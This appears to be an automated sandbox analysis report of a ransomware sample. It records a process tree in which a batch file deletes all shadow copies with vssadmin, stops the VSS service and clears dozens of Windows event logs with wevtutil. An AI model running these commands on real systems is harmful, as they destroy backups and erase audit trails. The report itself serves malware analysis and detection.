PID 2492 wrote to memory of 1948	2492	cmd.exe	44
PID 2492 wrote to memory of 1948	2492	cmd.exe	44
PID 2492 wrote to memory of 1948	2492	cmd.exe	44
PID 2492 wrote to memory of 2808	2492	cmd.exe	45
PID 2492 wrote to memory of 2808	2492	cmd.exe	45
PID 2492 wrote to memory of 2808	2492	cmd.exe	45
PID 2492 wrote to memory of 2596	2492	cmd.exe	46
PID 2492 wrote to memory of 2596	2492	cmd.exe	46
PID 2492 wrote to memory of 2596	2492	cmd.exe	46
PID 2492 wrote to memory of 2524	2492	cmd.exe	47
PID 2492 wrote to memory of 2524	2492	cmd.exe	47
PID 2492 wrote to memory of 2524	2492	cmd.exe	47
PID 2492 wrote to memory of 1808	2492	cmd.exe	48
PID 2492 wrote to memory of 1808	2492	cmd.exe	48
PID 2492 wrote to memory of 1808	2492	cmd.exe	48
PID 2492 wrote to memory of 2500	2492	cmd.exe	49
PID 2492 wrote to memory of 2500	2492	cmd.exe	49
PID 2492 wrote to memory of 2500	2492	cmd.exe	49
PID 2492 wrote to memory of 2500	2492	cmd.exe	49
PID 2492 wrote to memory of 2728	2492	cmd.exe	50
PID 2492 wrote to memory of 2728	2492	cmd.exe	50
PID 2492 wrote to memory of 2728	2492	cmd.exe	50
PID 2492 wrote to memory of 2728	2492	cmd.exe	50
PID 2492 wrote to memory of 1544	2492	cmd.exe	51
PID 2492 wrote to memory of 1544	2492	cmd.exe	51
PID 2492 wrote to memory of 1544	2492	cmd.exe	51
PID 2492 wrote to memory of 2644	2492	cmd.exe	52
PID 2492 wrote to memory of 2644	2492	cmd.exe	52
PID 2492 wrote to memory of 2644	2492	cmd.exe	52
PID 2492 wrote to memory of 2140	2492	cmd.exe	53
PID 2492 wrote to memory of 2140	2492	cmd.exe	53
PID 2492 wrote to memory of 2140	2492	cmd.exe	53
PID 2492 wrote to memory of 2720	2492	cmd.exe	54
PID 2492 wrote to memory of 2720	2492	cmd.exe	54
PID 2492 wrote to memory of 2720	2492	cmd.exe	54
PID 2492 wrote to memory of 2744	2492	cmd.exe	55
PID 2492 wrote to memory of 2744	2492	cmd.exe	55
PID 2492 wrote to memory of 2744	2492	cmd.exe	55
PID 2492 wrote to memory of 2744	2492	cmd.exe	55

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
"C:\Users\Admin\AppData\Local\Temp\de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe"
1⤵
- Drops startup file
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2996

C:\Windows\system32\taskeng.exe
taskeng.exe {BFA7C091-C6BD-433F-BBCB-1089BA33DB4F} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2656
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "c:\windows\temp\wtxjqqb.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2440
- - C:\Windows\system32\sc.exe
    sc start vss
    3⤵
    PID:2200
- - C:\Windows\system32\timeout.exe
    timeout /T 5
    3⤵
    - Delays execution with timeout.exe
    PID:968
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    PID:224
- - C:\Windows\System32\vssadmin.exe
    C:\Windows\System32\vssadmin.exe Delete Shadows /all /quiet
    3⤵
    PID:1880
- - C:\Windows\SysWOW64\vssadmin.exe
    C:\Windows\SysWOW64\vssadmin.exe Delete Shadows /all /quiet
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2504
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
    3⤵
    PID:2524
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:2696
- - C:\Windows\System32\vssadmin.exe
    C:\Windows\System32\vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB
    3⤵
    PID:332
- - C:\Windows\System32\vssadmin.exe
    C:\Windows\System32\vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=unbounded
    3⤵
    PID:956
- - C:\Windows\SysWOW64\vssadmin.exe
    C:\Windows\SysWOW64\vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2432
- - C:\Windows\SysWOW64\vssadmin.exe
    C:\Windows\SysWOW64\vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1820
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=F: /on=F: /maxsize=401MB
    3⤵
    PID:544
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=F: /on=F: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    PID:2456
- - C:\Windows\System32\vssadmin.exe
    C:\Windows\System32\vssadmin.exe resize shadowstorage /for=F: /on=F: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    PID:996
- - C:\Windows\System32\vssadmin.exe
    C:\Windows\System32\vssadmin.exe resize shadowstorage /for=F: /on=F: /maxsize=unbounded
    3⤵
    PID:780
- - C:\Windows\SysWOW64\vssadmin.exe
    C:\Windows\SysWOW64\vssadmin.exe resize shadowstorage /for=F: /on=F: /maxsize=401MB
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2592
- - C:\Windows\SysWOW64\vssadmin.exe
    C:\Windows\SysWOW64\vssadmin.exe resize shadowstorage /for=F: /on=F: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2160
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    PID:1552
- - C:\Windows\System32\vssadmin.exe
    C:\Windows\System32\vssadmin.exe Delete Shadows /all /quiet
    3⤵
    PID:2668
- - C:\Windows\SysWOW64\vssadmin.exe
    C:\Windows\SysWOW64\vssadmin.exe Delete Shadows /all /quiet
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1872
- - C:\Windows\system32\sc.exe
    sc stop VSS
    3⤵
    PID:2808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c WEVTUTIL EL
    3⤵
    PID:1936
  - - C:\Windows\system32\wevtutil.exe
      WEVTUTIL EL
      4⤵
      PID:2524
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Analytic"
    3⤵
    PID:2784
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Application"
    3⤵
    PID:2104
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "DebugChannel"
    3⤵
    PID:788
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "DirectShowFilterGraph"
    3⤵
    PID:1620
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "DirectShowPluginControl"
    3⤵
    PID:1544
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Els_Hyphenation/Analytic"
    3⤵
    PID:960
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "EndpointMapper"
    3⤵
    PID:692
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "ForwardedEvents"
    3⤵
    PID:1672
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "HardwareEvents"
    3⤵
    PID:2616
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Internet Explorer"
    3⤵
    PID:2728
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Key Management Service"
    3⤵
    PID:1808
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "MF_MediaFoundationDeviceProxy"
    3⤵
    PID:2284
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Media Center"
    3⤵
    PID:1340
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "MediaFoundationDeviceProxy"
    3⤵
    PID:1532
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "MediaFoundationPerformance"
    3⤵
    PID:1264
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "MediaFoundationPipeline"
    3⤵
    PID:2428
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "MediaFoundationPlatform"
    3⤵
    PID:1624
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-IE/Diagnostic"
    3⤵
    PID:880
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-IEDVTOOL/Diagnostic"
    3⤵
    PID:1500
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-IEFRAME/Diagnostic"
    3⤵
    PID:2528
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-JSDumpHeap/Diagnostic"
    3⤵
    PID:1336
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-PerfTrack-IEFRAME/Diagnostic"
    3⤵
    PID:2864
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-PerfTrack-MSHTML/Diagnostic"
    3⤵
    PID:2240
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ADSI/Debug"
    3⤵
    PID:2400
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-API-Tracing/Operational"
    3⤵
    PID:1944
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ATAPort/General"
    3⤵
    PID:856
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ATAPort/SATA-LPM"
    3⤵
    PID:2356
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ActionQueue/Analytic"
    3⤵
    PID:2016
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AltTab/Diagnostic"
    3⤵
    PID:724
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppID/Operational"
    3⤵
    PID:1600
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppLocker/EXE and DLL"
    3⤵
    PID:1956
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppLocker/MSI and Script"
    3⤵
    PID:2200
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Admin"
    3⤵
    PID:2044
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Analytic"
    3⤵
    PID:332
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Debug"
    3⤵
    PID:2932
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Operational"
    3⤵
    PID:2276
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
    3⤵
    PID:2580
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
    3⤵
    PID:2824
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
    3⤵
    PID:2212
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Inventory"
    3⤵
    PID:1564
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
    3⤵
    PID:1788
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Telemetry"
    3⤵
    PID:2908
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Audio/CaptureMonitor"
    3⤵
    PID:476
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Audio/Operational"
    3⤵
    PID:1948
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Audio/Performance"
    3⤵
    PID:2572
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Audit/Analytic"
    3⤵
    PID:1760
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Authentication User Interface/Operational"
    3⤵
    PID:832
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AxInstallService/Log"
    3⤵
    PID:2624
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Backup"
    3⤵
    PID:1764
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Biometrics/Operational"
    3⤵
    PID:592
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
    3⤵
    PID:1580
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
    3⤵
    PID:204
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Bits-Client/Analytic"
    3⤵
    PID:1872
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Bits-Client/Operational"
    3⤵
    PID:2620
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
    3⤵
    PID:2532
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BranchCache/Operational"
    3⤵
    PID:212
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
    3⤵
    PID:2504
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
    3⤵
    PID:2524
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BranchCacheSMB/Analytic"
    3⤵
    PID:1604
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BranchCacheSMB/Operational"
    3⤵
    PID:896
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CAPI2/Operational"
    3⤵
    PID:2480
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CDROM/Operational"
    3⤵
    PID:808
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-COM/Analytic"
    3⤵
    PID:2180
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-COMRuntime/Tracing"
    3⤵
    PID:2100
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Calculator/Debug"
    3⤵
    PID:1960
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Calculator/Diagnostic"
    3⤵
    PID:1984
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CertPoleEng/Operational"
    3⤵
    PID:2768
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
    3⤵
    PID:2972
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
    3⤵
    PID:2716
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CmiSetup/Analytic"
    3⤵
    PID:1552
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CodeIntegrity/Operational"
    3⤵
    PID:2696
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CodeIntegrity/Verbose"
    3⤵
    PID:588
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ComDlg32/Analytic"
    3⤵
    PID:2284
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ComDlg32/Debug"
    3⤵
    PID:1340
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
    3⤵
    PID:1824
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
    3⤵
    PID:2592
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CredUI/Diagnostic"
    3⤵
    PID:1444
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Crypto-RNG/Analytic"
    3⤵
    PID:880
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-D3D10Level9/Analytic"
    3⤵
    PID:1520
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-D3D10Level9/PerfTiming"
    3⤵
    PID:2528
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DCLocator/Debug"
    3⤵
    PID:1336
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DNS-Client/Operational"
    3⤵
    PID:324
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DUI/Diagnostic"
    3⤵
    PID:2240
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DUSER/Diagnostic"
    3⤵
    PID:2420
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DXGI/Analytic"
    3⤵
    PID:856
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DXGI/Logging"
    3⤵
    PID:2356
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DXP/Analytic"
    3⤵
    PID:720
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Analytic"
    3⤵
    PID:708
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Debug"
    3⤵
    PID:2228
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Operational"
    3⤵
    PID:2200
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Deplorch/Analytic"
    3⤵
    PID:2884
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceSync/Analytic"
    3⤵
    PID:2288
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceSync/Operational"
    3⤵
    PID:2312
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceUx/Informational"
    3⤵
    PID:2560
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceUx/Performance"
    3⤵
    PID:712
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dhcp-Client/Admin"
    3⤵
    PID:1788
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dhcp-Client/Operational"
    3⤵
    PID:2908
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DhcpNap/Admin"
    3⤵
    PID:476
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DhcpNap/Operational"
    3⤵
    PID:1948
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dhcpv6-Client/Admin"
    3⤵
    PID:2572
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dhcpv6-Client/Operational"
    3⤵
    PID:2584
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DiagCpl/Debug"
    3⤵
    PID:2788
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Analytic"
    3⤵
    PID:2648
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Debug"
    3⤵
    PID:2376
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Operational"
    3⤵
    PID:2964
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-MSDE/Debug"
    3⤵
    PID:304
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Analytic"
    3⤵
    PID:2752
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Debug"
    3⤵
    PID:972
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Operational"
    3⤵
    PID:2620
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-PLA/Debug"
    3⤵
    PID:2532
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-PLA/Operational"
    3⤵
    PID:212
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
    3⤵
    PID:1736
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scheduled/Operational"
    3⤵
    PID:1676
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Admin"
    3⤵
    PID:1144
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Analytic"
    3⤵
    PID:2540
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Debug"
    3⤵
    PID:2604
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Operational"
    3⤵
    PID:1620
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
    3⤵
    PID:2940
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
    3⤵
    PID:2544
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-TaskManager/Debug"
    3⤵
    PID:1108
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-WDC/Analytic"
    3⤵
    PID:1996
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-WDI/Debug"
    3⤵
    PID:2616
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnostics-Networking/Debug"
    3⤵
    PID:2072
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnostics-Networking/Operational"
    3⤵
    PID:2432
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
    3⤵
    PID:1656
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
    3⤵
    PID:1096
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
    3⤵
    PID:1456
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
    3⤵
    - Clears Windows event logs
    PID:1932
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Operational"
    3⤵
    PID:2744
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Direct3D10/Analytic"
    3⤵
    PID:1624
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Direct3D10_1/Analytic"
    3⤵
    PID:1500
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Direct3D11/Analytic"
    3⤵
    PID:784
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Direct3D11/Logging"
    3⤵
    PID:1644
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Direct3D11/PerfTiming"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DirectShow-KernelSupport/Performance"
    3⤵
    PID:1952
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DirectSound/Debug"
    3⤵
    PID:2360
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DirectWrite-FontCache/Tracing"
    3⤵
    PID:2652
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DirectWrite/Tracing"
    3⤵
    PID:1648
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Disk/Operational"
    3⤵
    PID:2484
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DiskDiagnostic/Operational"
    3⤵
    PID:608
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
    3⤵
    PID:568
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DiskDiagnosticResolver/Operational"
    3⤵
    PID:2472
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DisplayColorCalibration/Debug"
    3⤵
    PID:2132
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DisplayColorCalibration/Operational"
    3⤵
    PID:2876
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DisplaySwitch/Diagnostic"
    3⤵
    PID:2760
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Documents/Performance"
    3⤵
    PID:1864
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
    3⤵
    PID:2796
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DxgKrnl/Diagnostic"
    3⤵
    PID:1756
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DxgKrnl/Performance"
    3⤵
    PID:2580
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DxpTaskRingtone/Analytic"
    3⤵
    PID:1716
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
    3⤵
    PID:920
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EFS/Debug"
    3⤵
    PID:2260
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EapHost/Analytic"
    3⤵
    PID:1640
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EapHost/Debug"
    3⤵
    PID:2160
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EapHost/Operational"
    3⤵
    PID:1312
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EaseOfAccess/Diagnostic"
    3⤵
    PID:1836
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EventCollector/Debug"
    3⤵
    PID:1760
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EventCollector/Operational"
    3⤵
    PID:2584
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EventLog-WMIProvider/Debug"
    3⤵
    PID:2624
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EventLog/Analytic"
    3⤵
    PID:956
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EventLog/Debug"
    3⤵
    PID:2184
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FMS/Analytic"
    3⤵
    PID:1468
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FMS/Debug"
    3⤵
    PID:2436
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FMS/Operational"
    3⤵
    PID:968
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
    3⤵
    PID:1880
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
    3⤵
    PID:2608
